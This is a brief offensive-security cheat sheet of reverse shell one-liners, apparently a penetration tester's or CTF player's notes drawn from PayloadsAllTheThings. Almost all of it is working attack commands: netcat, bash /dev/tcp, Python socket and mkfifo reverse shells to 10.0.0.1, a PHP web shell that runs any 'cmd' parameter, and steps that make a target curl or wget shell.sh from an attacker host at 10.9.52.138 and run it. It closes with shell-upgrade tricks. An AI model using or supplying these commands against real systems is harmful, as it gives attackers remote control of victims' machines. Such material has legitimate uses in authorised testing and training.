Reverse shell
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Well-known reverse shells
# Listener
nc -lnvp 1234
# netcat
nc -e /bin/bash 10.0.0.1 1234
# bash
bash -i >& /dev/tcp/10.0.0.1/1234 0>&1
# python
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
# netcat (openbsd)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
# php webshell
<?php echo "<pre>" . system($_REQUEST["cmd"]) . "</pre>"; ?>
$ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.0.0.1/1234 0>&1' > shell.sh
$ python3 -m http.server 8000
?cmd=curl+10.9.52.138:8000/shell.sh+-o+/tmp/shell.sh
or
?cmd=wget+10.9.52.138:8000/shell.sh+-O+/tmp/shell.sh
$ nc -lvnp 1234
?cmd=bash+/tmp/shell.sh
Interative shell (upgrade your shell)
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
# Particularly useful with Windows shells (to use up/down arrows)
rlwrap nc -lvnp <port>
# On our computer
$ stty -a
speed 38400 baud; rows 17; columns 240; line = 0;
[...]
# On the reverse shell
stty rows 17
stty cols 240